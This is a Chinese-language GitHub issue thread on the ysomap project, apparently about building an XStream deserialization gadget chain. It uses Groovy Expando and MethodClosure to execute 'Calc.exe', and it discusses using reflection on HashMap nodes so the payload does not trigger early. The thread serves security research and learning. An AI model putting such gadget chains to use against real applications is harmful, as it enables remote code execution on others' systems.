### ISSUE TITLE
请问一下如何HashMap通过反射修改put方法,put进去的key

### ISSUE THREAD

**Issue by halodoom** [wh1t3p1g/ysomap#43]
我个人根据你的blog复现https://blog.0kami.cn/2020/04/18/java/talk-about-xstream-deserialization/ Groovy Expando这个方式的时候自己写的代码是这样的MethodClosure methodClosure=new MethodClosure("Calc.exe","execute");
        Expando expando=new Expando();
        expando.setProperty("hashCode",methodClosure);

        HashMap map=new HashMap();
        map.put("test",expando);
        Field key=Class.forName("java.util.HashMap$Node").getDeclaredField("key");
        key.setAccessible(true);
        key.set(map,expando);
        XStream xStream=new XStream();
        String xml=xStream.toXML(map);
        System.out.println(xml);
        xStream.fromXML(xml);
        我发现这个key是无法修改的因为是final类型，但是我发现如果put的时候直接放入expando对象的化会提前触发命令执行，这里我无法解决这个问题看了看你这个项目里的代码我不明白你的makemap 方法为何要如此处理

**Comment by wh1t3p1g** [comment]
> 但是我发现如果put的时候直接放入expando对象的化会提前触发命令执行

为了解决这个问题

**Comment by halodoom** [comment]
自己重新看了看HashMap的源码大概明白了你是怎么构造的了第一个反射去创建我们的节点，因为key是被封装到了node里，第二个数组反射，是为了构造node数组对象，第三个反射是为了将hashmap的 table赋值为我们构造的node数组

**Comment by halodoom** [comment]
就是不太明白为啥你构造了两个节点
